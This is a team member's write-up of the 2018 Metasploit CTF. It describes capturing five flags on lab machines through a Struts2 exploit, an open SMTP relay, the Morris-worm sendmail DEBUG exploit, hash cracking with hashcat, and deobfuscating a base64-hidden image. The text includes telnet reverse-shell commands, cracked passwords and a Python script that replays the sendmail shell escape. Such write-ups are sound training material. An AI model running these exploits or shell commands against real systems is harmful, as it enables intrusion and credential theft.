Metasploit CTF 2018 Writeup

So just recently, I participated in the 2018 Metasploit CTF. I got some flags,
created some shells with my team, and had some fun. Some challenges were difficult and others were really straightforward. We ended up getting about 5 flags (I know, not a whole lot, but this was my first time participating in a CTF like this) and I am very proud of how much my team and I did. I will definitely be doing this CTF next year, as it is a very good one and I learned a lot from it. The methods used to acquire the flags below were worked out in collaboration with the team (B0rn2r00t, jetson23, Nukez, T, and fir, thank you guys) and are not solely my work. All credit goes to everyone involved in the CTF team.

Configuration

The CTF was organized in an interesting way. There were three boxes in total: two targets (one Windows and one Linux) and a Kali Linux jump box, reachable at a given IP, through which you had to attack them. Once connected to the Kali box, we attacked the targets from the terminal it gave us. (I did not realize this until after the competition, but you could configure proxychains through the Kali box and use tools from outside it, instead of being limited to the provided CLI and tools.)

3 of Clubs

The three of clubs was a very simple challenge. It could be found by simply reading the entire rules page on the CTF site. Once you do, you will find a line that looks like this:

Rules

This tells us to go to a website hosted on the Linux machine on port 31063. We can access it with the terminal browser links.

links http://172.16.28.38:31063

Once the page loads, we are asked to describe the reward we are seeking in one word, in a text field. The rules mention a splendiferous reward to be found on this server. Looking at the page source, the form takes what we type into the field, appends .png to it and treats the result as a URL.

So we can skip the form and fetch our flag directly with wget:

wget http://172.16.28.38:31063/splendiferous.png

And the three of clubs is now ours!

ThreeOfClubs

10 of Hearts

From here, we ran a port scan on the Ubuntu machine. We tried the Windows machine too, but we were unable to get any flags from it, so there won't be any information about it here. The output of the scan was:

Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-01 08:16 UTC
Nmap scan report for 172.16.28.37
Host is up (0.0046s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
25/tcp   open  smtp
79/tcp   open  finger
2222/tcp open  EtherNetIP-1
8080/tcp open  http-proxy
8181/tcp open  intermapper
8443/tcp open  https-alt

Reading this, we see an HTTP service on port 8080. Running Nmap's default scripts against it shows the page title, which identifies it as the Apache Struts 2 showcase application:

8080/tcp open  http-proxy
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Struts2 Showcase
|_Requested resource was showcase.action

From further analysis, we figured out that the Struts instance is version 2.3.x, and thankfully there is a Metasploit module for it: exploit/multi/http/struts2_code_exec_showcase, which exploits OGNL injection in the Struts 1 plugin's showcase integration action (S2-048, CVE-2017-9791). We ran it with the payload cmd/unix/reverse_bash.

The options we used are below. Note that TARGETURI is /integration/saveGangster.action rather than the module's default, because the showcase is deployed at the server root:

Module options (exploit/multi/http/struts2_code_exec_showcase):

   Name       Current Setting                   Required  Description
   ----       ---------------                   --------  -----------
   POSTPARAM  name                              yes       The HTTP POST parameter
   Proxies                                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.28.37                      yes       The target address range or CIDR identifier
   RPORT      8080                              yes       The target port (TCP)
   SSL        false                             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /integration/saveGangster.action  yes       The path to a struts application action
   VHOST                                        no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.28.36     yes       The listen address (an interface may be specified)
   LPORT  9010             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Universal

We got a shell with this, but now we must hunt for the flag. Luckily, we found it in the directory /usr/local/tomcat/tmp, where the 10 of hearts was sitting:

cd /usr/local/tomcat/tmp
ls -al
total 328
drwxr-xr-x  2 root root   4096 Nov 26 20:43 .
drwxr-xr-x 19 root root   4096 Dec  1 06:01 ..
-rwxr--r--  1 root root 326794 Nov 26 20:42 10_of_hearts

TenOfHearts

2 of Diamonds

This flag was a difficult one, as it took several steps to get. In our Nmap scan we noticed port 25 was open and running an SMTP server. We checked whether it was an open relay, and sure enough, it was:

msf5 auxiliary(scanner/smtp/smtp_relay) > exploit

[+] 172.16.28.37:25 - SMTP 220 2-of-diamonds Sendmail 5.51/5.17 ready at Mon, 1 Dec 86 03:02:45 PST\x0d\x0a
[*] 172.16.28.37:25 - "500 Command unrecognized\r\n"
[*] 172.16.28.37:25 - "250 <sender@example.com>... Sender ok\r\n"
[*] 172.16.28.37:25 - "250 <target@example.com>... Recipient ok\r\n"
[*] 172.16.28.37:25 - "354 Enter mail, end with \".\" on a line by itself\r\n"
[*] 172.16.28.37:25 - "250 Ok\r\n"
[+] 172.16.28.37:25 - Potential open SMTP relay detected: - MAIL FROM:<sender@example.com> -> RCPT TO:<target@example.com>
[*] 172.16.28.37:25 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The banner in that output (which we confirmed with another module) also tells us the SMTP server is Sendmail 5.51/5.17. Just like the 10 of hearts, there is an exploit for this specific version. We searched for anything related to sendmail and got these results:

Matching Modules
================

   Name                                        Disclosure Date  Rank       Check  Description
   ----                                        ---------------  ----       -----  -----------
   auxiliary/dos/smtp/sendmail_prescan         2003-09-17       normal     No     Sendmail SMTP Address prescan Memory Corruption
   exploit/linux/misc/hplip_hpssd_exec         2007-10-04       excellent  No     HPLIP hpssd.py From Address Arbitrary Command Execution
   exploit/multi/http/phpmailer_arg_injection  2016-12-26       manual     No     PHPMailer Sendmail Argument Injection
   exploit/solaris/lpd/sendmail_exec           2001-08-31       excellent  No     Solaris LPD Command Execution
   exploit/unix/smtp/clamav_milter_blackhole   2007-08-24       excellent  No     ClamAV Milter Blackhole-Mode Remote Code Execution
   exploit/unix/smtp/morris_sendmail_debug     1988-11-02       average    Yes    Morris Worm sendmail Debug Mode Shell Escape
   post/linux/gather/enum_configs                               normal     No     Linux Gather Configurations

One big detail helped us pick the right module. The banner from the earlier relay scan says the server was ready on December 1, 1986, and the disclosure dates next to the modules show the Morris Worm module at 1988-11-02: a sendmail from 1986 still has the DEBUG command the worm abused, which lets a recipient of the form "| command" be handed to the shell along with the message body. We went with this module and the cmd/unix/reverse payload, and thankfully we were successful:

msf5 exploit(unix/smtp/morris_sendmail_debug) > exploit

[*] Started reverse TCP double handler on 172.16.28.36:4444
[*] 172.16.28.37:25 - Connecting to sendmail
[*] 172.16.28.37:25 - Enabling debug mode and sending exploit
[*] 172.16.28.37:25 - Sending: DEBUG
[*] 172.16.28.37:25 - Sending: MAIL FROM:<Br3XVjJuaJpXYManvhOxBXuwv>
[*] 172.16.28.37:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
[*] 172.16.28.37:25 - Sending: DATA
[*] 172.16.28.37:25 - Sending: PATH=/bin:/usr/bin:/usr/ucb:/etc
[*] 172.16.28.37:25 - Sending: export PATH
[*] 172.16.28.37:25 - Sending: sh -c '(sleep 3655|telnet 172.16.28.36 4444|while : ; do sh && break; done 2>&1|telnet 172.16.28.36 4444 >/dev/null 2>&1 &)'
[*] 172.16.28.37:25 - Sending: .
[*] 172.16.28.37:25 - Sending: QUIT
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo oq9MvZlFwNKDbXzN;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: Connected: not found\r\nsh: Escape: not found\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (172.16.28.36:4444 -> 172.16.28.37:48210) at 2018-12-01 11:06:29 +0000
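As an added example (mine, not part of the original writeup and not Metasploit's code), here is the same SMTP traffic done by hand in Python, so both the relay check and the DEBUG-mode shell escape are visible as raw protocol. probe_open_relay performs the check auxiliary/scanner/smtp/smtp_relay does (a 250 to RCPT TO for a foreign recipient after a foreign MAIL FROM), and sendmail_debug_exploit sends the exact command sequence shown in the morris_sendmail_debug log above, with the body lines the log shows. ScriptedConn and its canned replies are constructed stand-ins for the target so the script runs offline; the sender address, the HELO name and the listener address and port are assumptions.

```python
import re
import socket


class ScriptedConn:
    """Constructed stand-in for a socket: replays canned server replies so the
    example runs offline. Use connect() instead to talk to a real host."""

    def __init__(self, replies):
        self.replies = list(replies)   # one reply string per server turn
        self.sent = []                 # everything the client wrote

    def sendall(self, data):
        self.sent.append(data.decode())

    def recv(self, n):
        return self.replies.pop(0).encode() if self.replies else b""

    def close(self):
        pass


def connect(host, port, timeout=10):
    return socket.create_connection((host, port), timeout=timeout)


class SMTPSession:
    """Minimal line-oriented SMTP client: send one command, read one reply."""

    def __init__(self, conn):
        self.conn, self.buf, self.log = conn, b"", []

    def _readline(self):
        while b"\n" not in self.buf:
            chunk = self.conn.recv(4096)
            if not chunk:
                break
            self.buf += chunk
        line, _, self.buf = self.buf.partition(b"\n")
        return line.decode(errors="replace").rstrip("\r")

    def reply(self):
        """Return (code, text); joins multi-line '250-...' continuations."""
        code, parts = 0, []
        while True:
            line = self._readline()
            m = re.match(r"^(\d{3})([ -]?)(.*)$", line)
            if not m:
                return code, line            # connection closed or garbage
            code, parts = int(m.group(1)), parts + [m.group(3)]
            if m.group(2) != "-":
                return code, " ".join(parts)

    def send(self, line):
        """Write a line without waiting: DATA body lines draw no reply."""
        self.conn.sendall((line + "\r\n").encode())

    def cmd(self, line):
        self.send(line)
        code, text = self.reply()
        self.log.append((line, code, text))
        return code


def probe_open_relay(sess, sender="sender@example.com", rcpt="target@example.com"):
    """What smtp_relay checks: neither domain is local, yet RCPT TO gets a 250."""
    sess.reply()                          # 220 banner
    sess.cmd("HELO probe.example")        # the log's 500 is sendmail 5.x rejecting EHLO; HELO works
    if sess.cmd(f"MAIL FROM:<{sender}>") != 250:
        sess.cmd("QUIT")
        return False
    accepted = sess.cmd(f"RCPT TO:<{rcpt}>") == 250
    sess.cmd("RSET")                      # do not actually queue a message
    sess.cmd("QUIT")
    return accepted


# Recipient that is a pipe: after DEBUG, sendmail 5.x hands the whole message
# to sh. sed deletes lines 1..first blank line (the headers) so only the body runs.
RCPT_PIPE = "RCPT TO:<\"| sed '1,/^$/d' | sh; exit 0\">"


def reverse_shell_body(lhost, lport):
    """The body lines the writeup's log shows (cmd/unix/reverse, double telnet)."""
    return [
        "PATH=/bin:/usr/bin:/usr/ucb:/etc",
        "export PATH",
        f"sh -c '(sleep 3655|telnet {lhost} {lport}|while : ; do sh && break; "
        f"done 2>&1|telnet {lhost} {lport} >/dev/null 2>&1 &)'",
    ]


def sendmail_debug_exploit(sess, lhost, lport, sender="nobody@example.com"):
    """Replays the morris_sendmail_debug sequence; returns the reply codes seen."""
    sess.reply()                                              # banner
    codes = [sess.cmd("DEBUG"),                               # turn on debug mode
             sess.cmd(f"MAIL FROM:<{sender}>"),
             sess.cmd(RCPT_PIPE),
             sess.cmd("DATA")]                                # expect 354
    for line in reverse_shell_body(lhost, lport):
        sess.send(line)
    codes.append(sess.cmd("."))                               # 250: body handed to sh
    sess.cmd("QUIT")
    return codes


if __name__ == "__main__":
    # Constructed replies modelled on the writeup's output. Against a real host,
    # a listener on LHOST:LPORT (e.g. nc -lvp 4444) would catch the shell.
    canned = ["220 2-of-diamonds Sendmail 5.51/5.17 ready\r\n",
              "250 2-of-diamonds Hello probe.example\r\n",
              "250 <sender@example.com>... Sender ok\r\n",
              "250 <target@example.com>... Recipient ok\r\n",
              "250 Reset state\r\n", "221 closing connection\r\n"]
    print("open relay:", probe_open_relay(SMTPSession(ScriptedConn(canned))))
```

The RSET in the relay probe is the difference between a check and an actual relayed message; the Metasploit module goes on to send DATA and a body, which is why its output ends with "250 Ok".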

We are not root on this system, so let us see if we can get some password hashes. The system is old enough that the hashes are still kept in /etc/passwd itself, so cat /etc/passwd gives them to us, and we are done with the shell for now. We put the hashes into hash-identifier, which tells us they are traditional DES crypt hashes (hashcat mode 1500). Using hashcat with the rockyou wordlist, we cracked most of them:

ec2-user@kali:~/ubuntu$ hashcat -m 1500 -a 0 hashes /usr/share/wordlists/rockyou.txt --force

FA/4weg1/wy2c:biteme ghg
OciUqGHcs9YOw:fatcat tef
s.EZm/wQTqbro:whocares ralph
NYqgD2jjeuozk:hacker Shannon
hnZ1ZK5H2qapE:lancelot miriam
uxxJaRZvgyiPg:fun rich
6l7zMyp8dZLZU:foobar ckusick
Yd6H6R7ejeIP2:raygun sam
.6s.pzMqjyMrU:haring jim
STpwu/Ggmk78A:noexit van
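Added example (mine, not the writeup's): a small Python helper that does the triage we did by hand with hash-identifier. It takes /etc/passwd lines, keeps only the accounts that actually carry a hash, recognises the 13-character traditional DES crypt format (hashcat -m 1500) by its shape, and emits user:hash lines that hashcat accepts with --username. It also encodes one caveat worth knowing before a mask attack on these hashes: DES crypt only uses the first 8 characters of a password, so masks longer than 8 can never find anything new. The passwd lines in it are constructed for the example, except hunter's hash, which is the one from this writeup.

```python
import re

# Traditional DES crypt: 2-char salt + 11 chars, all from the ./0-9A-Za-z alphabet.
DESCRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")
DESCRYPT_MAX_LEN = 8   # crypt(3) DES ignores everything after the 8th character

# hashcat -m values for the formats this helper can recognise
HASHCAT_MODE = {"descrypt": 1500, "md5crypt": 500, "sha512crypt": 1800, "bcrypt": 3200}


def classify(h):
    """Best-effort hash type from its shape; None when there is nothing to crack."""
    if h in ("", "*", "!", "!!", "x"):        # locked, or moved to /etc/shadow
        return None
    if DESCRYPT.match(h):
        return "descrypt"
    if h.startswith("$1$"):
        return "md5crypt"
    if h.startswith("$6$"):
        return "sha512crypt"
    if h.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"
    return "unknown"


def parse_passwd(text):
    """Yield (user, hash, kind) for every well-formed passwd line."""
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or not fields[0]:
            continue                           # comments, blanks, truncated lines
        user, h = fields[0], fields[1]
        yield user, h, classify(h)


def hashcat_input(text, kind="descrypt"):
    """user:hash lines for: hashcat --username -m <mode> file wordlist"""
    return [f"{u}:{h}" for u, h, k in parse_passwd(text) if k == kind]


def mask_plan(kind, min_len, max_len, charset="?a"):
    """Mask lengths worth trying. Clipped to 8 for DES crypt, because any longer
    candidate hashes identically to its first 8 characters."""
    if kind == "descrypt":
        max_len = min(max_len, DESCRYPT_MAX_LEN)
    return [charset * n for n in range(min_len, max_len + 1)]


if __name__ == "__main__":
    # Constructed passwd excerpt; hunter's hash is the one from the writeup.
    SAMPLE = """\
root:*:0:0:Charlie Root:/:/bin/sh
hunter:IE4EHKRqf6Wvo:100:100:Hunter:/usr/guest/hunter:/bin/sh
svc:x:200:200:Shadowed account:/var/svc:/bin/false
# a comment line that must be skipped
"""
    for line in hashcat_input(SAMPLE):
        print(line)
    print(mask_plan("descrypt", 6, 10))
```

The 8-character cap is also why an exhaustive mask attack is realistic against descrypt at all: the keyspace is bounded by the hash, not by how long the user's password really was.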

We can now log in with these credentials, but we are not able to access a certain folder, namely /etc/guest/hunter. Hunter's hash did not fall to the rockyou wordlist, so we had to brute-force it with a mask attack instead, incrementing from length 6 (the mask below covers every printable character at each position):

hashcat -m 1500 IE4EHKRqf6Wvo -a 3 ?a?a?a?a?a?a?a -i --increment-min=6 --force

IE4EHKRqf6Wvo:msfhack hunter

Thankfully it was successful, and the password turns out to be msfhack. We switch to hunter to access his folder. In it we find the movemail program, which is setuid root and so lets us copy any file on the system. We used it to copy over the 2 of Diamonds:

movemail /usr/games/lib/2_of_diamonds.dat /usr/guest/2_of_diamonds.dat

Unfortunately, it is encrypted and unreadable, but while poking around we found an adventure file in /usr/games. Of course, we copied it over too:

movemail /usr/games/adventure /usr/hunter/adventure

We made the adventure file executable and ran it. I will spare the details, since it takes a while, but once you complete it you get the password to decrypt the 2 of Diamonds.

TwoOfDiamonds

5 of Spades

To get the 5 of Spades, you simply needed to poke around in Metasploit a bit. Once we did, we found a very interesting module called exploit/multi/ctf/flag. Running it outputs this:

5_of_spades is at http://host-ip:9021/0.png

All we have to do is fetch that URL with wget, and the flag is ours.

FiveofSpades

8 of Diamonds

To find the 8 of diamonds, we look at the service on port 8181, which turns out to be an HTTP server. Using wget, we can download the page and analyze it locally in the console (note the capital -O: lowercase -o would write wget's log to the file instead of the page):

wget http://172.16.28.37:8181/ -O page.html

Inspecting the HTML, there is some JavaScript in the file, and on closer analysis it is obfuscated. IlluminateJS can deobfuscate it: we paste the obfuscated code into https://illuminatejs.com/ and get readable code back.

Once we do, the readable code contains a blob of base64-encoded data. All we have to do is copy it into a text file and decode it:

base64 -d flag.txt > flag.png

The decoded output is a PNG file, which just so happens to be our flag!
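As an added example (mine, not from the writeup), here is the last step as a script instead of a manual copy-paste: it scans a saved page for long base64 runs, decodes each one and identifies the result by its magic bytes, so a PNG hidden in JavaScript is recognised and written out even when the deobfuscated code does not say what the blob is. The HTML in it is constructed, with a fake PNG payload (a valid signature followed by junk); the output filename prefix is an assumption.

```python
import base64
import binascii
import re
import sys

# File signatures worth recognising in a carved blob
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"%PDF-": "pdf",
    b"PK\x03\x04": "zip",
}
# A base64 run long enough not to be an ordinary identifier, plus optional padding
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def sniff(raw):
    """File type by magic bytes, or None if unrecognised."""
    for sig, kind in MAGIC.items():
        if raw.startswith(sig):
            return kind
    return None


def find_blobs(text):
    """Yield (encoded, decoded) for every run that is syntactically valid base64."""
    for m in B64_RUN.finditer(text):
        enc = m.group(0)
        try:
            yield enc, base64.b64decode(enc, validate=True)
        except binascii.Error:
            continue                 # wrong length or padding: not really base64


def carve(text):
    """List of (kind, bytes) for blobs whose decoded bytes start with a known magic."""
    out = []
    for _, raw in find_blobs(text):
        kind = sniff(raw)
        if kind:
            out.append((kind, raw))
    return out


def carve_to_files(text, prefix="carved"):
    """Write each recognised blob to <prefix>_<n>.<kind>; returns the names."""
    names = []
    for i, (kind, raw) in enumerate(carve(text)):
        name = f"{prefix}_{i}.{kind}"
        with open(name, "wb") as f:
            f.write(raw)
        names.append(name)
    return names


# Constructed sample: a fake PNG inside obfuscated-looking JS, next to two
# decoys (a short string and a long run of letters that decodes to nothing useful)
FAKE_PNG = b"\x89PNG\r\n\x1a\n" + bytes(range(64))
SAMPLE_HTML = ('<script>var _0x1a=["' + base64.b64encode(FAKE_PNG).decode() +
               '","aGVsbG8=","abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz"];</script>')


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as f:
            page = f.read()
    else:
        page = SAMPLE_HTML
    for kind, raw in carve(page):
        print(kind, len(raw), "bytes")
```

Run it as `python carve.py page.html` on the saved page; the magic check is what separates the flag image from the other base64 strings an obfuscator leaves lying around.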

8 of Diamonds

Again, this CTF was very interesting and educational for both me and my team. I would like to thank my teammates and Rapid7 for this CTF. Without them, I could not have done most of the things in it. I hope and expect to do this again next year.

Until then…